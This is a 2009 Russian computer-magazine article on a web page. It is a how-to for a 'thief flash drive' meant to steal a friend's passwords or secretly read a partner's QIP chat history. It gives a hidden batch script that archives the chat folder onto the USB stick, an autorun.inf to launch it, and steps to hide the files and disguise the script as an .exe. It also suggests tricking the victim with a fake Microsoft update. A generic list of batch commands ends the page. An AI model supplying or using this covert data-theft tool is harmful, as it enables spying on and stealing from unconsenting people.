Сделать стартовой    Добавить в Избранное
 
Дата:   24.10.2014 г.
Время:
 
 
Знаю как!


ПРОСТО * ДОСТУПНО * ИНТЕРЕСНО
01796
Подписной
индекс
Опрос
У вас сканер
Погода
 
Архив - Флешка-вор: Пишем .bat-файл с автозапуском - Журнал «Компьютер»
Флешка-вор: Пишем .bat-файл с автозапуском
№ 9-10'2009     Сергей Стефанович     Тема: Безопасность     ( Прочитано 16662 раз )
 
Бывают ситуации, когда позарез надо добраться до информации, которая находится на чужом компьютере. А прямого доступа к компьютеру мы не имеем.
 
Например, у знакомого надо стянуть текстовый файлик с паролями, который находится на рабочем столе (у меня половина знакомых хранит свои логины и пароли в блокнотике на рабочем столе. Там есть и пароли от почты, и от аськи, и от социальных сетей).
А знакомый ни под каким предлогом не пускает Вас к своему компьютеру. Или другая ситуация. Надо узнать с кем и о чём общается в аське на работе ваша «вторая половинка»...
Как же быть? Выход есть и очень простой! Надо написать специальный батник и закинуть его на флешку «жертве». После того, как флешка будет подключена к компьютеру наш батник запустится в невидимом режиме и скопирует всё, что надо, на флешку.
Батник – это обычный текстовый файл, содержащий наборы команд интерпретатора и имеющий расширение .bat или .cmd (.cmd работают только в ОС семейства NT). Редактировать такие файлы можно при помощи блокнота или любого другого текстового редактора.
 
Пишем батник
 
Создавать батник будем для второй ситуации (она немного сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:
 
@Echo off
c:
chdir C:Program FilesQIPUsers
f:rar.exe a -r users > nul
copy users.rar g:abc > nul
del users.rar > nul
 
где
 
@Echo off – скрывает визуальный процесс копирования
C:Program FilesQIPUsers – папка, в которой находится история
f:rar.exe a -r users > nul – запуск архиватора для ускорения копирования
copy users.rar g:abc > nul – адрес куда копируем
del users.rar > nul – удаляет созданный архив на жестком диске
 
Не всегда бывает известна буква флеш диска. В таком случае прописываем несколько вариантов (один уж точно угадаем):
 
@Echo off
c:
chdir C:Program FilesQIPUsers
f:rar.exe a -r users > nul
copy users.rar e:abc > nul
g:rar.exe a -r users > nul
copy users.rar g:abc > nul
h:rar.exe a -r users > nul
copy users.rar h:abc > nul
del users.rar > nul
 
Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расширение с .txt на .bat. Это можно сделать в Total Commander`е.
 
Создаем автозапуск
 
Теперь надо сделать так, чтобы батник автоматически запускался с флешки при подключении к компьютеру. Для этого создаём новый текстовый документ и пишем в нём:
 
[autorun]
ShellExeCute="xxx.bat"
 
Сохраняем и переименовываем на autorun.inf.
 
Делаем архив
 
Далее нам предстоит позаботится об архиваторе. QIP-история может быть большая. Чтобы процесс копирования происходил быстрее мы её заархивируем.
Из папки с WinRAR (по умолчанию С:Program FilesWinRAR) берём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бросаем остальные три файла (xxx.bat, autorun.inf, rar.exe).
Все файлы скрываем от посторонних глаз (правой кнопкой мыши вызываем меню на файле > Свойства > Скрытый). Это всё. Отдаём флешку «жертве» и ждём результата.
 
Социальная инженерия
 
Не обязательно делать автозапуск. «Жертва» сама может запустить батник. Для этого надо воспользоваться социальной инженерией. Например, сообщаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстродействие и безопасность операционной системы. Устанавливать обновление нужно только с флешки.
Можете сами придумать причину, по которой надо запустить наш батник. Всё зависит от вашей фантазии и смекалки.
 
Превращаем BAT в EXE
 
Для большей «безопасности» перегоним .bat в .exe (вдруг «жертва» знакома с написанием батников). В этом нам поможет небольшая программка ExeScript v3.0.
Скачать можно здесь: http://uploadbox.com/files/c8d5a60af9/ (размер 3.51 Mб). В окне программы жмём иконку с чистым листом и выбираем Batch file (bat) или File > New > Batch file (bat). В появившемся окне пишем наш «текст» (рис. 1).
 
Флешка-вор: Пишем .bat-файл с автозапуском 
Рис. 1
 
Теперь укажем для нашего exe-шника подходящую иконку. В окне Properties щёлкаем на поле Custom Icon и выбираем заранее подготовленную иконку (рис.2). Далее нажимаем F7 или Project > Build. Всё, exe-шник готов.
 
Флешка-вор: Пишем .bat-файл с автозапуском 
Рис. 2
 
Команды для написания bat-файлов
 
ASSOC – отображает или модифицирует связи расширений файлов
 
 
 
 
AT – планирует команды и программы для выполнения на компьютере.
ATTRIB – отображает или изменяет атрибуты файла.
BREAK – устанавливает или отменяет проверку комбинации [Ctrl+C].
CACLS – отображает или модифицирует списки управления доступом (ACLs) для файлов.
CALL – вызывает один *.BAT-файл из другого.
CD – отображает имя или изменяет имя текущей директории.
CHCP – отображает или устанавливает номер активной кодовой страницы.
CHDIR – отображает имя или изменяет имя текущей директории.
CHKDSK – проверяет диск и отображает отчет о состоянии.
CLS – очищает экран.
CMD – стартует новый экземпляр интерпретатора команд Windows NT.
COLOR – устанавливает цвета по умолчанию для переднего и заднего плана консоли.
COMMAND – стартует новую копию интерпретатора команд Windows.
COMP – сравнивает содержимое двух файлов или установки файлов.
COMPACT – отображает или видоизменяет сжатие файлов на партициях Windows NT(NTFS).
CONVERT – конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
COPY – копирует один или больше файлов в другое место.
CTTY – изменяет терминальное устройство, используемое для управления вашей системой.
DATE – отображает или устанавливает дату.
DEL – удаляет один или более файлов.
DEBUG – выполняет отладку, тестирование программ и редактирование инструментальных средств.
DIR – отображает список файлов и поддиректорий в директории.
DISKCOMP – сравнивает содержимое двух дискет.
DISKCOPY – копирует содержимое одной дискеты на другую.
DOSKEY – редактирует командные строки, восстанавливает команды Windows и создает макрос.
ECHO – отображает сообщения, или включает/выключает вывод команд.
EMM386 – включает/выключает поддержку расширенной памяти EMM386.
ENDLOCAL – заканчивает локализацию изменений окружающей среды в *.BAT-файле.
ERASE – удаляет один или более файлов.
EXIT – прекращает выполнение программы (интерпретатор команд).
EXTRACT – средство извлечения информации из CAB - файлов.
FC – сравнивает два файла или установки файлов, и отображает различие между ними.
FIND – ищет текстовую строку в файле или файлах.
FINDSTR – поиск строк в файлах.
FOR – выполняет указанную команду для каждого файла в наборе файлов.
FORMAT – форматирует диск для использования с Windows.
FTYPE – отображает или модифицирует типы файлов, используемых в связях расширений.
GOTO – направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
GRAFTABL – способность Windows отображать символы псевдографики, вставленные в графическом режиме.
HELP – обеспечивает информацию Help для команд Windows.
IF – выполняет обработку условия в *.BAT-файле.
KEYB – конфигурирует клавиатуру для заданного языка.
LABEL – создает, изменяет, или удаляет метку тома на диске.
MD – создает директорию.
MEM – отображает величину используемой и свободной памяти в вашей системе.
MKDIR – создает директорию.
MODE – конфигурирует системное устройство.
MORE – отображает вывод одного экрана за раз.
MOVE – перемещает один или более файлов из одной директории в другую на том же диске.
NETSTAT – отображает статистики протоколов и текущих сетевых соединений TCP/IP.
NLSFUNC – загружает информацию, специфическую для страны.
PATH – отображает или устанавливает путь поиска для выполняемых файлов.
PAUSE – приостанавливает обработку *.BAT-файла и отображает сообщение.
POPD – восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
PRINT – печатает текстовый файл.
PROMPT – изменяет подсказку к командам Windows.
PUSHD – сохраняет текущую директорию, потом изменяет.
RD – удаляет директорию.
RECOVER – восстанавливает читаемую информацию с плохого или дефектного диска.
REM – записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
REN – переименует файл или файлы.
RENAME – переименует файл или файлы.
REPLACE – заменяет файлы.
RESTORE – восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
RMDIR – удаляет директорию.
SET – отображает, устанавливает или удаляет переменные среды Windows.
SETLOCAL – начинает локализацию изменений среды в *.BAT-файле.
SETVER – устанавливает номер версии MS-DOS, который Windows сообщает программе.
SHIFT – сдвигает позицию замещаемых параметров в *.BAT-файле.
SMARTDRV – инсталлирует и конфигурирует утилиту кэширования диска SMART-драйва.
SORT – сортирует входной поток.
START – стартует отдельное окно для выполнения указанной программы или команды.
SUBST – связывает путь с литерой диска.
SYS – копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
TIME – отображает или устанавливает системное время.
TITLE – устанавливает заголовок окна для сеанса.
TREE – графически отображает структуру директория в драйве или путь.
TYPE – отображает содержимое текстового файла.
VER – отображает версию Windows.
VERIFY – сообщает Windows, проверять ли правильность записи файлов на диск.
VOL – отображает метку дискового тома и серийный номер.
XCOPY – копирует файлы и деревья директории.
 
Желаю удачи!

 
 
На главную страницу На предыдущую страницу На начало страницы
 
 
 
 
 
2009 - 2014 © СПД Зайцев А.Б.
Сайт является средством массовой информации.
При перепечатке и цитировании в печатных СМИ ссылка на журнал "Компьютер" обязательна.
При перепечатке и цитировании в Интернете обязательна активная гиперссылка на сайт Comput.com.ua, не закрытая для индексирования.
Украина онлайн Рейтинг@Mail.ru Рейтинг Сайтов YandeG Український рейтинг TOP.TOPUA.NET

Первый Каталог - Новости высоких технологий